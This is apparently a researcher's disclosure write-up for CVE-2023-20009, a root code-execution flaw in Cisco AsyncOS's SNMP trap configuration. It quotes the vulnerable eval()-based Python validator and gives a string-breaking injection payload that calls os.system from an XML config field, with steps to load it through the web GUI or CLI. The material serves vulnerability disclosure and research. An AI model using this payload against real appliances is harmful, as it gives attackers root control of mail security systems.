Share
## https://sploitus.com/exploit?id=5F88448A-DD17-5D44-ADF8-D5AF5D256740
# About
Security researcher: ly1g3, ly1g3[at]tuta.io
GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Overview: Remote Code Execution - RCE from config file
CVE: CVE-2023-20009
Timeline:
* Discovered - ly1g3
* Reported - ly1g3
* Fixed - Cisco
# Cisco AsyncOS 14.2.0
ESA (Cisco Secure Email) and Cisco Secure Email and Web Manager
## Privilege escalation - root shell
A authenticated user with permissions to SNMP-config can execute arbitrary code as root using a specially crafted SNMP trap config.
## Technical
Code exploited `ui_checker.py`:
```python
def validate_trap_configuration(base, value_dict):
validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
for k, v in value_dict.iteritems():
if validators.has_key(k):
base, conf_class_str = validators[k].rsplit('.', 1)
module = __import__(base, fromlist=[conf_class_str])
conf_class = eval('module.%s("%s")' % (conf_class_str, v))
else:
raise FilterError('validate_%s_trap_configuration_value' % (base,),
_("Trap does not allow configuration"), k)
return value_dict
```
`v` will be contain the value of `common_trap.common_configuration`
```xml
connectivityFailure
0
http://asd.asd."+os.system("touch test.txt"))#,5
```
### Steps to trigger using WEB-GUI:
1. `https://192.168.1.10/system_administration/configuration_file`
2. "Load a configuration file from local computer"
3. Replace current `connectivityFailure` field with payload above
### Steps to trigger using CLI
1. `loadconfig`
2. Paste payload